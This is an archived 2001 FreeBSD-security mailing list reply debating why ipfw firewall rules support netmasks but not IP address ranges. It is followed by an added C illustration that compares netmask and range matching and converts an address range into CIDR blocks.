Received: from NIC1 (early.morning.ru [195.161.98.238]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id NAA45393 for ; Sun, 22 Apr 2001 13:03:38 +0800 (KRAST) (envelope-from poige@morning.ru)
Date: Sun, 22 Apr 2001 13:04:14 +0700
From: Igor Podlesny
X-Mailer: The Bat! (v1.52 Beta/7) UNREG / CD5BF9353B3B7091
Reply-To: Igor Podlesny
Organization: Morning Network
X-Priority: 3 (Normal)
Message-ID: <68144568768.20010422130414@morning.ru>
To: freebsd-security@FreeBSD.ORG
Subject: Re[2]: ipfw problem
X-Sender: Igor Podlesny
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

PP> On Sat, Apr 21, 2001 at 06:25:13PM +0100, Lee Smallbone wrote:
>> Hi Peter,
>>
>> Thanks for your workaround, although it's not quite what I'd hoped for. (why does ipfw not allow
>> ranges?? If the author is listening...)
>>
>> I thought I had it for one minute, where I found that ${ip} isn't defined until later on
>> in the script. No such luck.

PP> Hmm, I didn't quite parse that - are you saying that ${ip} really isn't defined
PP> until later? If so, has that solved your problem?

PP> And about the ranges - ipfw(8) is only a controlling interface to the kernel
PP> ipfw routines.

sure

PP> It would be *much* harder for the kernel to compare every
PP> packet's address against a range than it is to compare it against a netmask -
PP> the latter only involves a bitwise AND operator.

I rather don't agree with that statement, but consider, we should decide what *MUCH* is at any case :) And pay your attention, plz -- it does check port ranges absolutely easy.. I don't see any big difference between ports and IP-addresses. They both are represented as usual (not too big) numbers at last.

PP> I wonder if ranges would
PP> be so hard to implement though; the fact is, they are not implemented at
PP> the moment, this would take some work, and actually, I'm not aware of any
PP> other firewalling system that implements ranges. I would be VERY much out
PP> of my bailiwick here, though, because I've not dealt with that many other
PP> firewalling systems, but still, I think ranges are somewhat unusual in
PP> firewall rules :)

PP> G'luck,
PP> Peter

--
Igor
mailto:poige@morning.ru
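The netmask-versus-range point Peter and Igor argue about, illustrated with added C code that is not from ipfw or from any poster on this thread: match_mask is the single AND-and-compare test a netmask rule costs, match_range is the two-compare test of the kind already used for port ranges, and range_to_cidrs goes beyond the thread to show how an arbitrary address range can still be written as a list of netmask rules, which is the usual way to express a range in ipfw's address/bits syntax. The 10.0.0.5 - 10.0.0.20 range used in the check is constructed.

```c
#include <stdint.h>

/* Netmask test as the kernel does it: one AND, one compare. */
int match_mask(uint32_t addr, uint32_t net, uint32_t mask)
{
    return (addr & mask) == (net & mask);
}
/* Range test: the same two compares a port-range check needs. */
int match_range(uint32_t addr, uint32_t lo, uint32_t hi)
{
    return addr >= lo && addr <= hi;
}
static uint32_t mask_of(int bits)
{
    return bits == 0 ? 0 : 0xFFFFFFFFu << (32 - bits);
}
/* Split the inclusive range [lo,hi] into the minimal list of CIDR blocks: at each
 * step take the largest aligned block that starts at cur and does not pass hi. */
int range_to_cidrs(uint32_t lo, uint32_t hi, uint32_t *nets, int *bits, int max)
{
    uint64_t cur = lo;
    int n = 0;
    while (cur <= hi && n < max) {
        int b = 32;
        while (b > 0) {
            uint64_t size = 1ULL << (33 - b);  /* block size if widened by one bit */
            if (cur % size != 0 || cur + size - 1 > hi)
                break;
            b--;
        }
        nets[n] = (uint32_t)cur;
        bits[n++] = b;
        cur += 1ULL << (32 - b);
    }
    return n;
}
/* Check: every address in [lo,hi] hits exactly one block, the neighbours hit none. */
int cidrs_equal_range(uint32_t lo, uint32_t hi)
{
    uint32_t nets[64];
    int bits[64], n = range_to_cidrs(lo, hi, nets, bits, 64);
    for (uint64_t a = lo ? lo - 1u : 0; a <= (uint64_t)hi + 1 && a <= 0xFFFFFFFFu; a++) {
        int hits = 0;
        for (int i = 0; i < n; i++)
            hits += match_mask((uint32_t)a, nets[i], mask_of(bits[i]));
        if (hits != match_range((uint32_t)a, lo, hi))
            return 0;
    }
    return 1;
}
```

For 10.0.0.5 - 10.0.0.20 the decomposition yields five blocks (10.0.0.5/32, 10.0.0.6/31, 10.0.0.8/29, 10.0.0.16/30, 10.0.0.20/32), so a range rule becomes five netmask rules rather than one.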